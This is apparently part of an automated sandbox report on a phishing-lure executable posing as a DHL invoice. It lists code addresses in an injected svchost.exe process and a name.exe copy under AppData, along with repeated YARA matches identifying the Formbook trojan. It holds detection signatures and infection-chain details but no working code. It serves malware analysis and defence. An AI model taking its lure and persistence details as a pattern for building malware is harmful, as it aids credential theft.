Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E2AA	3_2_0041E2AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E334	3_2_0041E334
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041DBD2	3_2_0041DBD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041D573	3_2_0041D573
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402D88	3_2_00402D88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00409E60	3_2_00409E60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041EE60	3_2_0041EE60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00409E1A	3_2_00409E1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E61E	3_2_0041E61E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E639	3_2_0041E639
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041DF12	3_2_0041DF12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D003E6	3_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA352	3_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC02C0	3_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0274	3_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF81CC	3_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF41A2	3_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D001AA	3_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC8158	3_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30100	3_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3C7C0	3_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64750	3_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5C6E0	3_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D00591	3_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEE4F6	3_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF2446	3_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4420	3_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF6BD7	3_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFAB40	3_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0A9A6	3_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E8F0	3_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C268B8	3_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4A840	3_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C42840	3_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32FC8	3_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4CFE0	3_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBEFA0	3_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB4F40	3_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C82F28	3_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60F30	3_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE2F30	3_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFEEDB	3_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C52E90	3_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFCE93	3_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40E59	3_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFEE26	3_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3ADE0	3_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C58DBF	3_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4AD00	3_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDCD1F	3_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30CF2	3_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0CB5	3_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40C00	3_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C8739A	3_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2D34C	3_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF132D	3_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5B2C0	3_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE12ED	3_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C452A0	3_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4B1B0	3_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7516C	3_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2F172	3_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0B16B	3_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEF0CC	3_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C470C0	3_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF70E9	3_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFF0E0	3_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFF7B0	3_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF16CC	3_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C85630	3_2_03C85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D095C3	3_2_03D095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDD5B0	3_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF7571	3_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C31460	3_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFF43F	3_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB5BF0	3_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7DBF9	3_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5FB80	3_2_03C5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFB76	3_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEDAC6	3_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDDAAC	3_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C85AA0	3_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE1AA3	3_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFA49	3_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF7A46	3_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB3A6C	3_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C49950	3_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5B950	3_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD5910	3_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C438E0	3_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAD800	3_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C03FD2	3_2_03C03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C03FD5	3_2_03C03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C41F92	3_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFFB1	3_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFF09	3_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C49EB0	3_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5FDC0	3_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C43D40	3_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF1D5A	3_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF7D73	3_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFCF2	3_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB9C32	3_2_03CB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCA036	3_2_03BCA036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCB232	3_2_03BCB232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BC1082	3_2_03BC1082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCE5CD	3_2_03BCE5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BC5B30	3_2_03BC5B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BC5B32	3_2_03BC5B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BC8912	3_2_03BC8912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BC2D02	3_2_03BC2D02

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 00420A30 appears 46 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 0041F9F2 appears 40 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 00409CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CAEA12 appears 86 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00640A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0063F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00629CB3 appears 31 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 7332

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.name.exe.b50000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.name.exe.b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.name.exe.1df0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.name.exe.1df0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1511902893.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.1626007911.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1450894006.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2683430368.0000000003610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1590633261.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
